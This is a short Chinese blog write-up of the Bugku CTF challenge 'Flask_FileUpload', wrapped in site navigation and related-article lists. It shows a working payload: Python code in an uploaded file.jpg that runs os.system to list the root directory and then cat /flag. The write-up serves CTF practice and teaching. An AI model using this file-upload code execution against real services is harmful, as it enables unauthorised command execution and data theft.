技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
IT_陈寒
1 小时前
Vue这个坑我跳了两次,原来问题出在这
前端·人工智能·后端
kyriewen
1 小时前
我用 50 行代码重写了 React Router 核心,终于搞懂了前端路由原理
前端·javascript·react.js
ServBay
2 小时前
9 个 Python 第三方库推荐,不用 AI 都好像多出一个团队
后端·python
用户835629078051
2 小时前
如何使用 Python 添加和管理 Excel 批注(完整示例)
后端·python
WebInfra
2 小时前
Rspack 2.1 发布:React Compiler 提速 10 倍!
前端
用户835629078051
2 小时前
使用 Python 管理 Excel 工作表:创建、复制、删除与重命名
后端·python
李明卫杭州
2 小时前
CSS 媒体查询详解:一文掌握响应式设计的核心技术
前端
lichenyang453
2 小时前
从 H5 按钮到 OpenHarmony 能力调用:我如何理解 ASCF 的运行链路
前端
下家
3 小时前
我放弃了 Vue/React,选择自研框架
前端·前端框架
Asize
3 小时前
HTML5 Canvas 基础:从按帧动画到 ECharts 数据可视化
前端·javascript·canvas
热门推荐
012026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?022026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04【AI】2026 年具身智能模型和世界模型总结05Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析06飞书长连接_事件订阅(接收消息,审批任务状态变更)07GitHub 镜像站点08【AI总结】2026年6月 主流国内外大模型总结09Trae国际版与国内版深度测评:AI原生IDE的双生花10AI科技热点日报 | 2026年6月1日